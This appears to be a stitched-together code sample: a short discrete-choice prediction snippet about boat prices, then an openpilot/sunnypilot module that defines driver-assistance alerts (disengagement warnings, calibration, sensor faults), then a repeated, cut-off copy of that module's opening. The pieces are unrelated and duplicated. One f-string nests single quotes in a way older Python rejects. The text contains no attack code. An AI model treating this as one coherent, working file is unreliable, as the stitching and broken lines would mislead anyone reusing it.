choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
df.loc[df['alt']=='boat', 'price'] *= 1.2 # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']} batch") |
from enum import IntEnum
from typing import Dict, Union, Callable
from cereal import log, car
import cereal.messaging as messaging
from common.realtime import DT_CTRL
from selfdrive.config import Conversions as CV
from selfdrive.locationd.calibrationd import MIN_SPEED_FILTER
AlertSize = log.ControlsState.AlertSize
AlertStatus = log.ControlsState.AlertStatus
VisualAlert = car.CarControl.HUDControl.VisualAlert
AudibleAlert = car.CarControl.HUDControl.AudibleAlert
EventName = car.CarEvent.EventName
# Alert priorities
class Priority(IntEnum):
LOWEST = 0
LOWER = 1
LOW = 2
MID = 3
HIGH = 4
HIGHEST = 5
# Event types
class ET:
ENABLE = 'enable'
PRE_ENABLE = 'preEnable'
NO_ENTRY = 'noEntry'
WARNING = 'warning'
USER_DISABLE = 'userDisable'
SOFT_DISABLE = 'softDisable'
IMMEDIATE_DISABLE = 'immediateDisable'
PERMANENT = 'permanent'
# get event name from enum
EVENT_NAME = {v: k for k, v in EventName.schema.enumerants.items()}
class Events:
def __init__(self):
self.events = []
self.static_events = []
self.events_prev = dict.fromkeys(EVENTS.keys(), 0)
@property
def names(self):
return self.events
def __len__(self):
return len(self.events)
def add(self, event_name, static=False):
if static:
self.static_events.append(event_name)
self.events.append(event_name)
def clear(self):
self.events_prev = {k: (v + 1 if k in self.events else 0) for k, v in self.events_prev.items()}
self.events = self.static_events.copy()
def any(self, event_type):
for e in self.events:
if event_type in EVENTS.get(e, {}).keys():
return True
return False
def create_alerts(self, event_types, callback_args=None):
if callback_args is None:
callback_args = []
ret = []
for e in self.events:
types = EVENTS[e].keys()
for et in event_types:
if et in types:
alert = EVENTS[e][et]
if not isinstance(alert, Alert):
alert = alert(*callback_args)
if DT_CTRL * (self.events_prev[e] + 1) >= alert.creation_delay:
alert.alert_type = f"{EVENT_NAME[e]}/{et}"
alert.event_type = et
ret.append(alert)
return ret
def add_from_msg(self, events):
for e in events:
self.events.append(e.name.raw)
def to_msg(self):
ret = []
for event_name in self.events:
event = car.CarEvent.new_message()
event.name = event_name
for event_type in EVENTS.get(event_name, {}).keys():
setattr(event, event_type, True)
ret.append(event)
return ret
class Alert:
def __init__(self,
alert_text_1: str,
alert_text_2: str,
alert_status: log.ControlsState.AlertStatus,
alert_size: log.ControlsState.AlertSize,
priority: Priority,
visual_alert: car.CarControl.HUDControl.VisualAlert,
audible_alert: car.CarControl.HUDControl.AudibleAlert,
duration: float,
alert_rate: float = 0.,
creation_delay: float = 0.):
self.alert_text_1 = alert_text_1
self.alert_text_2 = alert_text_2
self.alert_status = alert_status
self.alert_size = alert_size
self.priority = priority
self.visual_alert = visual_alert
self.audible_alert = audible_alert
self.duration = int(duration / DT_CTRL)
self.alert_rate = alert_rate
self.creation_delay = creation_delay
self.alert_type = ""
self.event_type = None
def __str__(self) -> str:
return f"{self.alert_text_1}/{self.alert_text_2} {self.priority} {self.visual_alert} {self.audible_alert}"
def __gt__(self, alert2) -> bool:
return self.priority > alert2.priority
class NoEntryAlert(Alert):
def __init__(self, alert_text_2, visual_alert=VisualAlert.none):
super().__init__("openpilot Unavailable", alert_text_2, AlertStatus.normal,
AlertSize.mid, Priority.LOW, visual_alert,
AudibleAlert.refuse, 3.)
class SoftDisableAlert(Alert):
def __init__(self, alert_text_2):
super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
AlertStatus.userPrompt, AlertSize.full,
Priority.MID, VisualAlert.steerRequired,
AudibleAlert.warningSoft, 2.),
# less harsh version of SoftDisable, where the condition is user-triggered
class UserSoftDisableAlert(SoftDisableAlert):
def __init__(self, alert_text_2):
super().__init__(alert_text_2),
self.alert_text_1 = "openpilot will disengage"
class ImmediateDisableAlert(Alert):
def __init__(self, alert_text_2):
super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.steerRequired,
AudibleAlert.warningImmediate, 4.),
class EngagementAlert(Alert):
def __init__(self, audible_alert: car.CarControl.HUDControl.AudibleAlert):
super().__init__("", "",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none,
audible_alert, .2),
class NormalPermanentAlert(Alert):
def __init__(self, alert_text_1: str, alert_text_2: str = "", duration: float = 0.2, priority: Priority = Priority.LOWER, creation_delay: float = 0.):
super().__init__(alert_text_1, alert_text_2,
AlertStatus.normal, AlertSize.mid if len(alert_text_2) else AlertSize.small,
priority, VisualAlert.none, AudibleAlert.none, duration, creation_delay=creation_delay),
class StartupAlert(Alert):
def __init__(self, alert_text_1: str, alert_text_2: str = "To use MADS, press the LFA or ACC MAIN button", alert_status=AlertStatus.normal):
super().__init__(alert_text_1, alert_text_2,
alert_status, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, 10.),
# ********** helper functions **********
def get_display_speed(speed_ms: float, metric: bool) -> str:
speed = int(round(speed_ms * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH)))
unit = 'km/h' if metric else 'mph'
return f"{speed} {unit}"
# ********** alert callback functions **********
AlertCallbackType = Callable[[car.CarParams, messaging.SubMaster, bool, int], Alert]
def soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
def func(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
if soft_disable_time < int(0.5 / DT_CTRL):
return ImmediateDisableAlert(alert_text_2)
return SoftDisableAlert(alert_text_2)
return func
def user_soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
def func(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
if soft_disable_time < int(0.5 / DT_CTRL):
return ImmediateDisableAlert(alert_text_2)
return UserSoftDisableAlert(alert_text_2)
return func
def below_engage_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
return NoEntryAlert(f"Speed Below {get_display_speed(CP.minEnableSpeed, metric)}")
def below_steer_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
return Alert(
f"Steer Unavailable Below {get_display_speed(CP.minSteerSpeed, metric)}",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.prompt, 0.4)
def calibration_incomplete_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
return Alert(
"Calibration in Progress: %d%%" % sm['liveCalibration'].calPerc,
f"Drive Above {get_display_speed(MIN_SPEED_FILTER, metric)}",
AlertStatus.normal, AlertSize.mid,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2)
def no_gps_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
gps_integrated = sm['peripheralState'].pandaType in [log.PandaState.PandaType.uno, log.PandaState.PandaType.dos]
return Alert(
"Poor GPS reception",
"If sky is visible, contact support" if gps_integrated else "Check GPS antenna placement",
AlertStatus.normal, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=300.)
def wrong_car_mode_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
text = "Cruise Mode Disabled"
if CP.carName == "honda":
text = "Main Switch Off"
return NoEntryAlert(text)
def joystick_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
axes = sm['testJoystick'].axes
gb, steer = list(axes)[:2] if len(axes) else (0., 0.)
vals = f"Gas: {round(gb * 100.)}%, Steer: {round(steer * 100.)}%"
return NormalPermanentAlert("Joystick Mode", vals)
def speed_limit_adjust_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
speedLimit = sm['longitudinalPlan'].speedLimit
speed = round(speedLimit * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH))
message = f'Adjusting to {speed} {'km/h' if metric else 'mph'} speed limit'
return Alert(
message,
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 4.)
EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = {
# ********** events with no alerts **********
EventName.stockFcw: {},
# ********** events only containing alerts displayed in all states **********
EventName.joystickDebug: {
ET.WARNING: joystick_alert,
ET.PERMANENT: NormalPermanentAlert("Joystick Mode"),
},
EventName.controlsInitializing: {
ET.NO_ENTRY: NoEntryAlert("System Initializing"),
},
EventName.startup: {
ET.PERMANENT: StartupAlert("sunnypilot Initialized")
},
EventName.startupMaster: {
ET.PERMANENT: StartupAlert("WARNING: This branch is not tested",
alert_status=AlertStatus.userPrompt),
},
# Car is recognized, but marked as dashcam only
EventName.startupNoControl: {
ET.PERMANENT: StartupAlert("Dashcam mode"),
},
# Car is not recognized
EventName.startupNoCar: {
ET.PERMANENT: StartupAlert("Dashcam mode for unsupported car"),
},
EventName.startupNoFw: {
ET.PERMANENT: StartupAlert("Car Unrecognized",
"Check comma power connections",
alert_status=AlertStatus.userPrompt),
},
EventName.dashcamMode: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
priority=Priority.LOWEST),
},
EventName.invalidLkasSetting: {
ET.PERMANENT: NormalPermanentAlert("Stock LKAS is on",
"Turn off stock LKAS to engage"),
},
EventName.cruiseMismatch: {
#ET.PERMANENT: ImmediateDisableAlert("openpilot failed to cancel cruise"),
},
# Some features or cars are marked as community features. If openpilot
# detects the use of a community feature it switches to dashcam mode
# until these features are allowed using a toggle in settings.
EventName.communityFeatureDisallowed: {
ET.PERMANENT: NormalPermanentAlert("openpilot Unavailable",
"Enable Community Features in Settings"),
},
# openpilot doesn't recognize the car. This switches openpilot into a
# read-only mode. This can be solved by adding your fingerprint.
# See https://github.com/commaai/openpilot/wiki/Fingerprinting for more information
EventName.carUnrecognized: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
"Car Unrecognized",
priority=Priority.LOWEST),
},
EventName.stockAeb: {
ET.PERMANENT: Alert(
"BRAKE!",
"Stock AEB: Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.none, 2.),
ET.NO_ENTRY: NoEntryAlert("Stock AEB: Risk of Collision"),
},
EventName.fcw: {
ET.PERMANENT: Alert(
"BRAKE!",
"Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.warningSoft, 2.),
},
EventName.ldw: {
ET.PERMANENT: Alert(
"Lane Departure Detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.ldw, AudibleAlert.prompt, 3.),
},
# ********** events only containing alerts that display while engaged **********
EventName.gasPressed: {
ET.PRE_ENABLE: Alert(
"Release Gas Pedal to Engage",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .1, creation_delay=1.),
},
# openpilot tries to learn certain parameters about your car by observing
# how the car behaves to steering inputs from both human and openpilot driving.
# This includes:
# - steer ratio: gear ratio of the steering rack. Steering angle divided by tire angle
# - tire stiffness: how much grip your tires have
# - angle offset: most steering angle sensors are offset and measure a non zero angle when driving straight
# This alert is thrown when any of these values exceed a sanity check. This can be caused by
# bad alignment or bad sensor data. If this happens consistently consider creating an issue on GitHub
EventName.vehicleModelInvalid: {
ET.NO_ENTRY: NoEntryAlert("Vehicle Parameter Identification Failed"),
ET.SOFT_DISABLE: soft_disable_alert("Vehicle Parameter Identification Failed"),
},
EventName.steerTempUnavailableSilent: {
ET.WARNING: Alert(
"Steering Temporarily Unavailable",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.prompt, 1.),
},
EventName.preDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.promptDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"Driver Distracted",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverDistracted: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Distracted",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel: No Face Detected",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel",
"Driver Unresponsive",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverUnresponsive: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Unresponsive",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preKeepHandsOnWheel: {
ET.WARNING: Alert(
"No hands on steering wheel detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptKeepHandsOnWheel: {
ET.WARNING: Alert(
"HANDS OFF STEERING WHEEL",
"Place hands on steering wheel",
AlertStatus.critical, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.keepHandsOnWheel: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Driver kept hands off sterring wheel"),
},
EventName.manualRestart: {
ET.WARNING: Alert(
"TAKE CONTROL",
"Resume Driving Manually",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.resumeRequired: {
ET.WARNING: Alert(
"STOPPED",
"Press Resume to Go",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.belowSteerSpeed: {
ET.WARNING: below_steer_speed_alert,
},
EventName.preLaneChangeLeft: {
ET.WARNING: Alert(
"Steer Left to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.preLaneChangeRight: {
ET.WARNING: Alert(
"Steer Right to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.laneChangeBlocked: {
ET.WARNING: Alert(
"Car Detected in Blindspot",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.prompt, .1),
},
EventName.laneChange: {
ET.WARNING: Alert(
"Changing Lanes",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.manualSteeringRequired: {
ET.WARNING: Alert(
"MADS is OFF",
"Manual Steering Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.disengage, 2.),
},
EventName.manualLongitudinalRequired: {
ET.WARNING: Alert(
"Smart/Adaptive Cruise Control is OFF",
"Manual Gas/Brakes Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.steerSaturated: {
ET.WARNING: Alert(
"Take Control",
"Turn Exceeds Steering Limit",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 1.),
},
# Thrown when the fan is driven at >50% but is not rotating
EventName.fanMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Fan Malfunction", "Contact Support"),
},
# Camera is not outputting frames at a constant framerate
EventName.cameraMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Camera Malfunction", "Contact Support"),
},
# Unused
EventName.gpsMalfunction: {
ET.PERMANENT: NormalPermanentAlert("GPS Malfunction", "Contact Support"),
},
# When the GPS position and localizer diverge the localizer is reset to the
# current GPS position. This alert is thrown when the localizer is reset
# more often than expected.
EventName.localizerMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Sensor Malfunction", "Contact Support"),
},
EventName.speedLimitActive: {
ET.WARNING: Alert(
"Cruise set to speed limit",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.speedLimitValueChange: {
ET.WARNING: speed_limit_adjust_alert,
},
# ********** events that affect controls state transitions **********
EventName.pcmEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.buttonEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.silentButtonEnable: {
ET.ENABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.pcmDisable: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.buttonCancel: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.brakeHold: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.silentBrakeHold: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.parkBrake: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Parking Brake Engaged"),
},
EventName.pedalPressed: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed",
visual_alert=VisualAlert.brakePressed),
},
EventName.silentPedalPressed: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed During Attempt",
visual_alert=VisualAlert.brakePressed),
},
EventName.wrongCarMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: wrong_car_mode_alert,
},
EventName.wrongCruiseMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Adaptive Cruise Disabled"),
},
EventName.steerTempUnavailable: {
ET.SOFT_DISABLE: soft_disable_alert("Steering Temporarily Unavailable"),
ET.NO_ENTRY: NoEntryAlert("Steering Temporarily Unavailable"),
},
EventName.outOfSpace: {
ET.PERMANENT: NormalPermanentAlert("Out of Storage"),
ET.NO_ENTRY: NoEntryAlert("Out of Storage"),
},
EventName.belowEngageSpeed: {
ET.NO_ENTRY: below_engage_speed_alert,
},
EventName.sensorDataInvalid: {
ET.PERMANENT: Alert(
"No Data from Device Sensors",
"Reboot your Device",
AlertStatus.normal, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("No Data from Device Sensors"),
},
EventName.noGps: {
ET.PERMANENT: no_gps_alert,
},
EventName.soundsUnavailable: {
ET.PERMANENT: NormalPermanentAlert("Speaker not found", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Speaker not found"),
},
EventName.tooDistracted: {
ET.NO_ENTRY: NoEntryAlert("Distraction Level Too High"),
},
EventName.overheat: {
ET.PERMANENT: NormalPermanentAlert("System Overheated"),
ET.SOFT_DISABLE: soft_disable_alert("System Overheated"),
ET.NO_ENTRY: NoEntryAlert("System Overheated"),
},
EventName.wrongGear: {
ET.SOFT_DISABLE: user_soft_disable_alert("Gear not D"),
ET.NO_ENTRY: NoEntryAlert("Gear not D"),
},
EventName.silentWrongGear: {
ET.SOFT_DISABLE: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
ET.NO_ENTRY: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
},
# This alert is thrown when the calibration angles are outside of the acceptable range.
# For example if the device is pointed too much to the left or the right.
# Usually this can only be solved by removing the mount from the windshield completely,
# and attaching while making sure the device is pointed straight forward and is level.
# See https://comma.ai/setup for more information
EventName.calibrationInvalid: {
ET.PERMANENT: NormalPermanentAlert("Calibration Invalid", "Remount Device and Recalibrate"),
ET.SOFT_DISABLE: soft_disable_alert("Calibration Invalid: Remount Device & Recalibrate"),
ET.NO_ENTRY: NoEntryAlert("Calibration Invalid: Remount Device & Recalibrate"),
},
EventName.calibrationIncomplete: {
ET.PERMANENT: calibration_incomplete_alert,
ET.SOFT_DISABLE: soft_disable_alert("Calibration in Progress"),
ET.NO_ENTRY: NoEntryAlert("Calibration in Progress"),
},
EventName.doorOpen: {
ET.SOFT_DISABLE: user_soft_disable_alert("Door Open"),
ET.NO_ENTRY: NoEntryAlert("Door Open"),
},
EventName.seatbeltNotLatched: {
ET.SOFT_DISABLE: user_soft_disable_alert("Seatbelt Unlatched"),
ET.NO_ENTRY: NoEntryAlert("Seatbelt Unlatched"),
},
EventName.espDisabled: {
ET.SOFT_DISABLE: soft_disable_alert("ESP Off"),
ET.NO_ENTRY: NoEntryAlert("ESP Off"),
},
EventName.lowBattery: {
ET.SOFT_DISABLE: soft_disable_alert("Low Battery"),
ET.NO_ENTRY: NoEntryAlert("Low Battery"),
},
# Different openpilot services communicate between each other at a certain
# interval. If communication does not follow the regular schedule this alert
# is thrown. This can mean a service crashed, did not broadcast a message for
# ten times the regular interval, or the average interval is more than 10% too high.
EventName.commIssue: {
ET.SOFT_DISABLE: soft_disable_alert("Communication Issue between Processes"),
ET.NO_ENTRY: NoEntryAlert("Communication Issue between Processes"),
},
# Thrown when manager detects a service exited unexpectedly while driving
EventName.processNotRunning: {
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.radarFault: {
ET.SOFT_DISABLE: soft_disable_alert("Radar Error: Restart the Car"),
ET.NO_ENTRY: NoEntryAlert("Radar Error: Restart the Car"),
},
# Every frame from the camera should be processed by the model. If modeld
# is not processing frames fast enough they have to be dropped. This alert is
# thrown when over 20% of frames are dropped.
EventName.modeldLagging: {
ET.SOFT_DISABLE: soft_disable_alert("Driving model lagging"),
ET.NO_ENTRY: NoEntryAlert("Driving model lagging"),
},
# Besides predicting the path, lane lines and lead car data the model also
# predicts the current velocity and rotation speed of the car. If the model is
# very uncertain about the current velocity while the car is moving, this
# usually means the model has trouble understanding the scene. This is used
# as a heuristic to warn the driver.
EventName.posenetInvalid: {
ET.SOFT_DISABLE: soft_disable_alert("Model Output Uncertain"),
ET.NO_ENTRY: NoEntryAlert("Model Output Uncertain"),
},
# When the localizer detects an acceleration of more than 40 m/s^2 (~4G) we
# alert the driver the device might have fallen from the windshield.
EventName.deviceFalling: {
ET.SOFT_DISABLE: soft_disable_alert("Device Fell Off Mount"),
ET.NO_ENTRY: NoEntryAlert("Device Fell Off Mount"),
},
EventName.lowMemory: {
ET.SOFT_DISABLE: soft_disable_alert("Low Memory: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("Low Memory", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Low Memory: Reboot Your Device"),
},
EventName.highCpuUsage: {
#ET.SOFT_DISABLE: soft_disable_alert("System Malfunction: Reboot Your Device"),
#ET.PERMANENT: NormalPermanentAlert("System Malfunction", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.accFaulted: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Faulted"),
ET.PERMANENT: NormalPermanentAlert("Cruise Faulted", ""),
ET.NO_ENTRY: NoEntryAlert("Cruise Faulted"),
},
EventName.controlsMismatch: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Controls Mismatch"),
},
EventName.roadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.driverCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.wideRoadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
# Sometimes the USB stack on the device can get into a bad state
# causing the connection to the panda to be lost
EventName.usbError: {
ET.SOFT_DISABLE: soft_disable_alert("USB Error: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("USB Error: Reboot Your Device", ""),
ET.NO_ENTRY: NoEntryAlert("USB Error: Reboot Your Device"),
},
# This alert can be thrown for the following reasons:
# - No CAN data received at all
# - CAN data is received, but some message are not received at the right frequency
# If you're not writing a new car port, this is usually cause by faulty wiring
EventName.canError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("CAN Error: Check Connections"),
ET.PERMANENT: Alert(
"CAN Error: Check Connections",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 1., creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("CAN Error: Check Connections"),
},
EventName.steerUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("LKAS Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("LKAS Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("LKAS Fault: Restart the Car"),
},
EventName.brakeUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
EventName.reverseGear: {
ET.PERMANENT: Alert(
"Reverse\nGear",
"",
AlertStatus.normal, AlertSize.full,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2, creation_delay=0.5),
ET.USER_DISABLE: ImmediateDisableAlert("Reverse Gear"),
ET.NO_ENTRY: NoEntryAlert("Reverse Gear"),
},
# On cars that use stock ACC the car can decide to cancel ACC for various reasons.
# When this happens we can no long control the car so the user needs to be warned immediately.
EventName.cruiseDisabled: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Is Off"),
},
# For planning the trajectory Model Predictive Control (MPC) is used. This is
# an optimization algorithm that is not guaranteed to find a feasible solution.
# If no solution is found or the solution has a very high cost this alert is thrown.
EventName.plannerError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Planner Solution Error"),
ET.NO_ENTRY: NoEntryAlert("Planner Solution Error"),
},
# When the relay in the harness box opens the CAN bus between the LKAS camera
# and the rest of the car is separated. When messages from the LKAS camera
# are received on the car side this usually means the relay hasn't opened correctly
# and this alert is thrown.
EventName.relayMalfunction: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Harness Malfunction"),
ET.PERMANENT: NormalPermanentAlert("Harness Malfunction", "Check Hardware"),
ET.NO_ENTRY: NoEntryAlert("Harness Malfunction"),
},
EventName.noTarget: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"No close lead car",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
ET.NO_ENTRY: NoEntryAlert("No Close Lead Car"),
},
EventName.speedTooLow: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"Speed too low",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
},
# When the car is driving faster than most cars in the training data, the model outputs can be unpredictable.
EventName.speedTooHigh: {
ET.WARNING: Alert(
"Speed Too High",
"Model uncertain at this speed",
AlertStatus.userPrompt, AlertSize.mid,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 4.),
ET.NO_ENTRY: NoEntryAlert("Slow down to engage"),
},
EventName.lowSpeedLockout: {
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
}
| from enum import IntEnum
from typing import Dict, Union, Callable
from cereal import log, car
import cereal.messaging as messaging
from common.realtime import DT_CTRL
from selfdrive.config import Conversions as CV
from selfdrive.locationd.calibrationd import MIN_SPEED_FILTER
AlertSize = log.ControlsState.AlertSize
AlertStatus = log.ControlsState.AlertStatus
VisualAlert = car.CarControl.HUDControl.VisualAlert
AudibleAlert = car.CarControl.HUDControl.AudibleAlert
EventName = car.CarEvent.EventName
# Alert priorities
class Priority(IntEnum):
LOWEST = 0
LOWER = 1
LOW = 2
MID = 3
HIGH = 4
HIGHEST = 5
# Event types
class ET:
ENABLE = 'enable'
PRE_ENABLE = 'preEnable'
NO_ENTRY = 'noEntry'
WARNING = 'warning'
USER_DISABLE = 'userDisable'
SOFT_DISABLE = 'softDisable'
IMMEDIATE_DISABLE = 'immediateDisable'
PERMANENT = 'permanent'
# get event name from enum
EVENT_NAME = {v: k for k, v in EventName.schema.enumerants.items()}
class Events:
def __init__(self):
self.events = []
self.static_events = []
self.events_prev = dict.fromkeys(EVENTS.keys(), 0)
